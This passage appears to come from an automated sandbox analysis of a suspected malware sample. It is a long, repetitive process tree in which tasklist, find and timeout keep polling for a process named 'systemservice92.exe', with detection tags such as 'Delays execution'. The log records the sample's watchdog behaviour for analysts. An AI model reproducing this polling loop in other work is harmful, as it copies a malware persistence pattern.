        PID:6004
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:7056
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6944
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:7108
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6928
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:7096
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:5764
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:1292
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:5816
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6548
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6120
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:6184
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:5868
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:5896
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5960
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6604
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:908
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:2404
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:5344
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6256
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:2024
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:4416
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:3172
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:1424
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6188
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:1920
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:2948
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:4728
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:3584
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:4092
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:1764
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:1744
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:1812
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6748
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:2676
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:2124
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:3348
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:2012
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:3452
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:5088
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:2456
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:72
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:5436
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6312
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:3536
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:1584
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:5024
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:2932
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:5968
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:2032
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:4332
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:4872
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:3112
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:6772
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:1832
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:2176
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:1472
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:3868
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:3156
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6260
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:1240
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6156
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:6392
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:5908
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:5672
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5228
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6056
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6208
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6384
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6212
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:5684
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5928
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:5428
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6492
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5876
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:5192
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:4232
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:3660
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6004
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:5380
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5568
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:7028
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:2716
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5732
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:2920
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:7040
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6120
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:856
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:2556
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6336
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:3324
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6604
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:1560
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6256
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:7120
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6648
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:1516
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:944
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:2992
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:5168
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:3544
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:712
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:3528
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:3584
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6876
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:2100
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:1924
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6796
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:6532
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:832
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:2160
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:4604
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:1176
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5024
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:2356
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:2104
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:240
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:3556
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:296
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:3448
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:1404
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6808
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6888
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:5952
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:4572
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:2840
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6756
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:3168
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5856
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6412
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:5484
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6500
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:6484
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:2568
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:312
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:5360
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6912
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:5136
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:7064
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6236
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:1208
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:7108
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:2648
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5732
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6404
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6764
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5324
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6008
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6292
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6416
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:4336
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:3860
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:6712
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:4964
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:2116
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:3584
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6352
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:1764
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:536
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:3076
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:4848
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:3636
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:1076
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:4088
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:2400
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:4080
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6028
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5052
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:2856
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:568
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:3480
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:5420
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6040
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5848
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:5636
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6096
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:5908
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:5536
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:5860
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5656
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:7140
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6716
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:1300
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:304
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:7036
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:2972
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:6216
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6436
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5584
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:5864
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:5492
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:6020
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:5540
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:1400
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:2748
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:7020
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6184
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:4984
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:6256
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:7120
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6600
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:1916
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:2904
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5068
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:5032
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:1920
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6644
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:3716
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:1544
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6224
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6776
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:3568
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:2576
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:4452
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:1304
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:72
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:5000
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:4308
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5040
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:1788
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:2032
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:1604
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:4820
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6028
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:4556
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6288
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6024
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:3720
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:3156
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6228
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6168
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:1276
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6692
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6888
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6176
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6072
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:6296
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6108
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:5828
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:5336
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6068
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:5720
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6944
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:2640
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6436
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:5268
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:5492
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:5784
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:5528
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:6328
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6404
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5480
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:3380
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6292
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:2704
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:5964
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:3344
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:3288
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:5168
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:2740
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6672
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:2100
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:3656
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6876
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:1756
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6788
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6752
    - - C:\Windows\system32\tasklist.exe
        
